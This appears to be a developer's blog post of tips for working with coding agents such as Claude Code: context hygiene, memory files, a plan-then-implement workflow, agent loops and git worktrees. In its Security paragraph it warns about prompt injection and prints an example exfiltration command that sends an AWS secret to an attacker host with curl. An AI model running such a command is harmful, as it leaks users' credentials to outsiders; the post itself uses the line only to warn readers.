Agentic Coding Data Dump
20 February, 2026
LLMs' coding capabilities have been advancing rapidly and causing massive disruption. In this post, I'll cover some non-linear data points about the current meta; the examples use Claude Code.
LLM Amnesia
LLMs are stateless. New session, new context window.
Context Engineering
Context engineering is having the most relevant tokens in the context window for a defined task. LLMs struggle with recall in large context windows, so strive to reset at the 40%–50% mark.
Useful cheatsheet:
- To visualize your context window, run the /context command.
- For Claude Code, you can run the /clear command to reset the context window.
- Opinionated, but I prefer to disable the /compact feature to control what gets compacted in the context window.
- Use /resume to resume a previous conversation (saves convos according to cwd).
- Run /init to generate a CLAUDE.md file.
Set up a custom status line to view your context percentage in real time.
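As a sketch, Claude Code supports a command-driven status line via its settings file; something like the following in ~/.claude/settings.json runs your own script (the path here is a placeholder) that prints the context percentage. Check the current docs for exact field names, as they may change.

```json
{
  "statusLine": {
    "type": "command",
    "command": "~/.claude/statusline.sh"
  }
}
```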
Protect Your Context
The input tokens you and your agent feed the LLM determine its performance. View your initial new-session usage percentage via the /context command, and keep it as low as possible without compromising agent enablement. Review all your memory files, MCP servers, skills, and tools to ensure they are relevant; stale memory files could be your biggest bottleneck when trying to be productive with a coding agent. It's also worth noting that because LLMs work via next-token prediction, you should never argue with the model: arguing just reinforces statistically bad behavior. Instead, create a handoff and start over.
Layered Knowledge
When creating memory files, it's better to layer knowledge around the workspace instead of cramming it all into one root CLAUDE.md file. Claude Code has a built-in feature where it lazy-loads nested CLAUDE.md files while traversing directories.
In practice, in a typical full-stack repo, this would mean defining your database migration patterns and naming conventions in the packages/backend/../db/migrations/CLAUDE.md path rather than in the root of the project.
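A minimal sketch of that layering, with illustrative paths and one-line contents (the conventions shown are examples, not prescriptions):

```shell
# Illustrative: a lean root CLAUDE.md plus a scoped one that the agent
# only pulls in when it actually works inside the migrations directory.
cd "$(mktemp -d)"   # throwaway workspace for the sketch
mkdir -p packages/backend/db/migrations
echo '# Monorepo basics: pnpm build, pnpm test, strict TypeScript' > CLAUDE.md
echo '# Migrations: NNNN_verb_object.sql; never edit applied migrations' \
  > packages/backend/db/migrations/CLAUDE.md
ls CLAUDE.md packages/backend/db/migrations/CLAUDE.md
```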
You can generate these files by running the /init command. Be sure to keep them updated. There is a skill for that.
Security
Agents cannot be trusted, and LLMs are vulnerable to prompt injections. Sandboxing them in an isolated dev environment helps mitigate system risks, but as long as a compromised agent has internet access, it can run malicious commands (such as curl www.attacker.com/steal?q=aws_secret=0HNOTHI5I5BAD) and you are pwned. Be warned: the dev machine is an attack surface.
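One cheap mitigation sketch, alongside real sandboxing: launch the agent process with a scrubbed environment so an injected command has no secrets to exfiltrate. Here printenv stands in for the agent binary, and the secret value is the fake one from above:

```shell
# env -i starts the child with an empty environment, passing through
# only an allowlist; the parent's AWS secret never reaches the child.
export AWS_SECRET_ACCESS_KEY="0HNOTHI5I5BAD"
env -i HOME="$HOME" PATH="$PATH" printenv AWS_SECRET_ACCESS_KEY \
  || echo "secret not visible to child process"
```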
ERPI - Epic, Research, Plan, Implement Methodology
Epic
The initial prompt. Voice record, transcribe, or write down a specification of what you want to achieve. Avoid ambiguity. This step is your highest leverage point, so put in the effort. Tools like Wisprflow are nice, but for a while I was just voice recording on WhatsApp and transcribing the .ogg files to text.
Research
Send a coding agent to explore and research the current codebase and relevant documentation, then review and validate the output. Research should describe the current state of the codebase, not implementation suggestions. Be wary of this; one strategy to avoid it is generating a list of research questions from the initial epic.md and then sending the agent off to research without any context about "why" it is researching.
Plan
The implementation plan is generated by combining research_output.md and epic.md. Review and refine the implementation plan so it aligns with your mental model of how the system should work and evolve. Unused features create unnecessary complexity. Remember YAGNI while ensuring the system stays extendable.
Notes before the implementation step
Non-deterministic coding agents thrive on determinism. You can accidentally steer a model in the wrong direction; you cannot accidentally steer a type checker. Ask Claude "is this code good?" and it says something entirely different every time, same model, same code. Type checkers, unit tests, and linters give the model deterministic feedback.
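As a sketch, the deterministic feedback can be one gate script the agent must pass after every change. The specific tools are placeholders; swap in whatever your stack uses:

```shell
# check runs one deterministic verifier and fails loudly on any error,
# giving the agent an unambiguous pass/fail signal instead of vibes.
check() { "$@" || { echo "FAILED: $*" >&2; exit 1; }; }

check true        # placeholder: swap in `tsc --noEmit`
check true        # placeholder: swap in `eslint .`
check true        # placeholder: swap in your test runner
echo "all deterministic checks passed"
```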
Time spent building tooling infrastructure compounds as a codebase grows, so it's worth investing some time in setup.
Implement
Once the plan is prepared and reviewed, send off the coding agent and wait for the asynchronous task to complete. To avoid permission fatigue, run the agent in a sandboxed environment where you can let it skip permission prompts. If that's not possible, configure a solid set of permissions and purchase a giant Enter button from China like I did.
Tips on Iterating on the Spec
Specs are contracts. When iterating over the markdown outputs, I leave XML annotations before feeding them back to the LLM to revise. I also recommend git-staging the previous draft so you can diff-review it after changes and confirm you haven't lost critical spec information.
# Annotation example
<ant> Change ORM from Prisma to Sequelize V6 </ant>
Real Example from one of my codebases
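The stage-then-diff review of spec drafts can be sketched like this (throwaway repo and file contents are illustrative):

```shell
set -e
cd "$(mktemp -d)" && git init -q
echo "ORM: Prisma" > plan.md
git add plan.md                     # snapshot the previous draft in the index
echo "ORM: Sequelize v6" > plan.md  # simulated LLM revision
git diff plan.md                    # review exactly what the revision changed
```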
Ralph Wiggum Loop
Agent control flow. Running coding agents in for-loops is a simple yet surprisingly effective method of managing context and completing large tasks.
Pseudo bash
for i in $(seq 1 "${MAX_ITERATIONS:-50}"); do
  result=$(claude -p "@prd.json @progress.txt \
1. Pick the highest-priority unfinished feature and implement only that one. \
2. Update the PRD and append progress to progress.txt for the next developer. \
3. Git commit the feature. \
If the PRD is complete, output <promise>COMPLETE</promise>.")
  echo "$result"
  if [[ "$result" == *"<promise>COMPLETE</promise>"* ]]; then
    echo "PRD complete, exiting."
    exit 0
  fi
done
Pseudo prompt
Convert my feature requirements into structured PRD items.
Each item should have: category, description, skills,
mcps, steps_to_verify, and passes: false.
Format as JSON. Be specific about acceptance criteria.
Pseudo tasks.json
[{
"task_description":
"Add Dark mode Button",
"steps_to_verify": [
"CSS mode changes",
"Icon toggles",
"Theme state persists through"
],
"passes": false
}]
Parallelism and Git Worktrees
Git has a built-in feature that has become very popular. Worktrees allow you to check out multiple branches from the same repository into separate directories simultaneously, which lets coding agents work on features without stepping over each other. That's how Vibe Kanban / Cursor Agents work under the hood. Although promising, agents still need a tight feedback loop such as local dev servers and tests, which is not always trivial when running multiple agents from one machine. I attempted to solve this by building my own SDLC tool over a weekend called haflow.
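A self-contained sketch of the worktree mechanics (throwaway repo; branch and directory names are illustrative):

```shell
set -e
cd "$(mktemp -d)" && git init -q main-repo && cd main-repo
git -c user.email=dev@example.com -c user.name=dev \
  commit -q --allow-empty -m "init"
# One directory per agent, same underlying repository
git worktree add -q ../agent-a -b feature/dark-mode
git worktree add -q ../agent-b -b feature/auth
git worktree list
```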
Closing Notes
Much of what I know comes from watching the best, playing around, and just being curious. So go out there and get your hands dirty: run a Ralph loop, write your own agent, and try tools, but keep your setup simple and manageable, and burn all your tokens!
- Tracer bullets: Small pieces of functionality built end-to-end to validate that what you are going to do on a large scale is even possible with your approach. Read more about it here!
- MCP Bloat: MCPs can bloat the context window with unnecessary tokens. In some cases, it could be beneficial to create in-house project tools for querying data instead of relying on a prebuilt holistic MCP solution. Example: a custom /get-ticket.sh script.
- Terminal multiplexers are cool: I use tmux; here's a setup blog.
- Communication: There is a lot to learn about how we communicate with LLMs from classic technical programming books. Open one up!
- Learning tests are code you write not to build a feature, but to prove how an external system behaves. When working with closed-source APIs/tools/binaries, you can ask the agent to create a test to confirm behavior. Interfaces can change, so checking these tests into your CI can be valuable for critical third-party dependencies.
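A toy learning test in that spirit: it pins down an external tool's behavior (here, that grep -c counts matching lines, not total matches) so the assumption is executable rather than tribal knowledge:

```shell
# "aa a" contains two matches of "a" but is one matching line;
# this test documents that grep -c counts lines, not occurrences.
count=$(printf 'aa a\nb\n' | grep -c a)
[ "$count" = "1" ] && echo "learned: grep -c counts matching lines"
```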
- Assumptions made during research propagate through the planning and implementation stages. A wrong assumption discovered at implementation forces you to redo everything upstream. Learning tests catch these early, when the cost of being wrong is cheap.
Happy Prompting!
Link dump:
- this post repo reference files and more
- Agent ping pong
- Ralph Wiggum - Geoffrey Huntley
- Agent autonomy
- Don't waste your back pressure
- Open University Grade Checker
- Simple Bash Agent
- What Is Sovereign AI? | NVIDIA Blog
- AI Hero
- BAML
- Gastown
- WebMCP
- humanlayer
- Haflow - A local fullstack webapp control panel for orchestrating containers
- Understanding LLM Inference Engines: Inside Nano-vLLM
- Vibe Kanban
- Fully automatic censorship removal for language models
- Agentic Engineering Patterns
- Large Scale Online Deanonymization
- AI Fatigue Is Real
- Kardashev Scale
- Wisprflow
- Mercury 2 - LLMs that are powered by diffusion